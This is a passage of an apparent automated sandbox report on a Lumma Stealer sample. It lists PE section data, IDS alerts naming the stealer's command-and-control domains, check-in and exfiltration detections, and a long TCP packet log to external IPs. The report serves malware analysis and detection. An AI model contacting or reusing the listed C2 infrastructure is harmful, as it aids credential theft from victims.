                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      pop es
                                                                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add al, 0Ah
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], cl
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      0x10000x520000x26400c337a537e31cd051ecd67ff43b1876e4False0.9995340584150327data7.979083511203261IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      0x550000x2a80000x200cff1718d22d7f5e9397238801f588814unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      jwydwysy0x2fd0000x1a00000x19fe00fd92823c7e5a612294c5a67c5fe8729aFalse0.9944206492335438data7.9543925612046IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      pczmnouq0x49d0000x10000x400035c9546444b9ebcd53b09d7c5d1ac27False0.802734375data6.25063174598312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .taggant0x49e0000x30000x22004caf1213ba53d82c0de0a958b58f246aFalse0.06089154411764706DOS executable (COM)0.7888011260555085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                      RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                      kernel32.dlllstrcpy

                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                      2024-12-26T12:54:06.257510+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.9505081.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:06.397092+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.9599311.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:06.767453+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.9542601.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:06.907983+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.9524981.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:07.050281+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.9505191.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:07.191673+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.9565531.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:07.334564+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.9602321.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:07.476243+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.9535581.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-26T12:54:09.261620+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.94972223.55.153.106443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:10.065762+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.94972223.55.153.106443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:11.746899+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949728172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:12.519459+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949728172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:12.519459+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949728172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:13.868234+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949734172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:14.667605+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949734172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:14.667605+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949734172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:16.670208+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949740172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:18.942161+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949746172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:21.673727+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949752172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:24.413493+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949761172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:25.170601+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949761172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:26.955349+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949768172.67.157.254443TCP
                                                                                                                                                                                                                                                      2024-12-26T12:54:30.039493+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949776172.67.157.254443TCP

                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.765539885 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.765590906 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.765685081 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.769340992 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:07.769357920 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.261503935 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.261620045 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.283409119 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.283438921 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.283804893 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.336246967 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.351886034 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:09.395329952 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065794945 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065826893 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065834999 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065855026 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065857887 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065870047 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065893888 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065912008 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065912008 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.065934896 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.261912107 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.261974096 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.262046099 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.262073994 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.262114048 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.292634964 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.292711020 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.292730093 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.292824030 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.292865038 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.294121027 CET49722443192.168.2.923.55.153.106
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.294147968 CET4434972223.55.153.106192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.437711000 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.437767029 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.437865019 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.438354015 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:10.438374996 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.746649027 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.746898890 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.773478031 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.773503065 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.773874044 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.789875984 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.789875984 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:11.790000916 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.519470930 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.519579887 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.519629002 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.519929886 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.519952059 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.519979000 CET49728443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.519984007 CET44349728172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.558079004 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.558140039 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.558207989 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.558590889 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:12.558605909 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.867948055 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.868233919 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.869885921 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.869891882 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.870145082 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.871352911 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.871483088 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:13.871500969 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.667618990 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.667671919 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.667756081 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.667787075 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.711304903 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.711348057 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.758153915 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.787144899 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.787372112 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.787410975 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.787442923 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.787466049 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.787511110 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.787528038 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.836416006 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906728983 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906802893 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906835079 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906857014 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906867027 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906893969 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906909943 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906924009 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906953096 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906961918 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906970024 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907006025 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907015085 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907051086 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907088995 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907165051 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907181978 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907191992 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907197952 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365144968 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365216017 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365303040 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365658998 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365681887 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.670032024 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.670207977 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.671761036 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.671771049 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.671994925 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.673341036 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.673485041 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.673506021 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.506175995 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.506295919 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.506355047 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.511217117 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.511240005 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637222052 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637276888 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637362003 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637684107 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:17.637693882 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.941977024 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.942161083 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.943717957 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.943742990 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.944008112 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945410013 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945574045 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945600986 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945656061 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:18.945668936 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034495115 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034595966 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034730911 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.034996986 CET49746443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.035044909 CET44349746172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.369064093 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.369113922 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.369256020 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.370155096 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:20.370176077 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.673541069 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.673727036 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.675637007 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.675657034 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.675899982 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678052902 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678150892 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678184986 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678258896 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:21.678272009 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.651705980 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.651802063 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.651851892 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.652029991 CET49752443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:22.652051926 CET44349752172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.107954025 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.107970953 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.108025074 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.108264923 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:23.108274937 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.413414001 CET44349761172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.413492918 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.415307999 CET49761443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:24.415324926 CET44349761172.67.157.254192.168.2.9
